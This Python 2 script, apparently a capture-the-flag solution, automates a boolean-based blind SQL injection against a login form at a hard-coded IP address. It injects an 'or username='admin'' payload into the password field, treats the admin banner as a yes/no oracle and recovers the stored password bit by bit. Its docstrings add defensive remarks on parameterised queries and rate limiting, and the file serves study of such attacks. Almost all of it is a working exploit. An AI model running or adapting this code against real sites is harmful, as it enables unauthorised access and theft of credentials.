import re,json,urllib,urllib2,cookielib
# Python 2 stdlib (urllib2/cookielib): one cookie jar shared by every
# urllib2.urlopen() call in this file, so the session cookie set by the
# login POST is replayed on later requests.
cj = cookielib.CookieJar()
cookie_handler = urllib2.HTTPCookieProcessor(cj)
session_opener = urllib2.build_opener(cookie_handler)
# Module-level side effect: replaces the process-wide default opener.
urllib2.install_opener(session_opener)
def submit(password,username='blahblah'):
    """Attempt a login and report whether the admin banner came back.

    GETs the login page, scrapes the form ``action`` and the ``name`` of the
    text and password inputs with regexes, POSTs *username*/*password* there
    (cookies ride along via the globally installed opener) and returns True
    only when the first ``h4.product-header`` text equals the hard-coded
    admin greeting.  Every ``[0]`` raises IndexError when a regex matches
    nothing, e.g. if the page layout changes.  Target host and greeting are
    hard-coded.
    """
    page = urllib2.urlopen('http://54.204.80.192/example').read()
    # Greedy ``.+`` captures: adequate for this one page, brittle elsewhere.
    action = re.findall(r'action="(.+)" ',page)[0]
    user_field = re.findall(r'input type="text" id="(.+)" name="(.+)"',page)[0][1]
    pass_field = re.findall(r'input type="password" id="(.+)" name="(.+)"',page)[0][1]
    data = {user_field: username, pass_field: password}
    data = urllib.urlencode(data)
    cont = urllib2.urlopen('http://54.204.80.192' + action,data).read()
    # The visible difference between this banner and any other response is
    # what the rest of the script uses as a yes/no oracle; a login page that
    # answers uniformly on failure, plus lockout/rate limiting, removes it.
    return re.findall(r'h4 class="product-header">(.+)</h4>',cont)[0] == 'Hello, admin!! My password is the flag!'
def get_bool( expression ):
    """Return True iff the server evaluates the SQL *expression* as true.

    The fragment is sent as the password of a login attempt through submit();
    the answer is decided solely by whether the admin banner appears, so the
    login form is being used as a one-bit oracle.  This only works because
    the password is concatenated into the server's query -- with a
    parameterised query the whole string is data, the login simply fails and
    this returns False for any *expression*.  Each call is one login POST
    whose password field carries SQL keywords, which is straightforward to
    log and alert on at the application or WAF layer.
    """
    result = submit(" ' or username='admin' and %s = 1 and ''=' " % expression)
    print 'Result:', result
    return result
def get_bit( expression ):
    """Return '1' when get_bool(*expression*) is true, else '0'.

    String form so the caller can concatenate bits into a binary literal.
    """
    return '1' if get_bool( expression ) else '0'
from itertools import count
def get_string( expression ):
    """Recover the value of *expression* one bit at a time via get_bit().

    ``i`` walks character positions from 1 (SQL ``substr`` is 1-based) and
    ``j`` walks the bit index from 7 down to 0, so ``char`` is assembled
    MSB-first and decoded with ``int(char, 2)``.  Extraction stops at the
    first NUL (0) character.  Every character costs eight get_bit() calls,
    i.e. eight login attempts through submit(); that burst of failed-looking
    logins from one session is the signal a defender sees, and login
    lockout or rate limiting bounds how far it gets.

    Progress is printed as it goes (Python 2 ``print`` statements; the
    trailing comma suppresses the newline so the bit lands on the same line).
    """
    result = ''
    for i in count( start=1 ):
        char = ''
        for j in range(8)[::-1]:
            print 'Byte %d, Bit %d,' % (i,j),
            bit = get_bit( 'ascii(substr(%s,%d,1))>>%d&1' % ( expression, i, j ) )
            print bit
            char += bit
        char = int( char, 2 )
        if char == 0: break
        result += chr(char)
    print '----------'
    print result
    print '----------'
    return result
# Module-level entry point: runs as soon as the file is imported or executed
# (there is no ``if __name__ == "__main__":`` guard).  The parenthesised form
# prints the same single value under Python 2 and is also valid Python 3 syntax.
print(get_string('password'))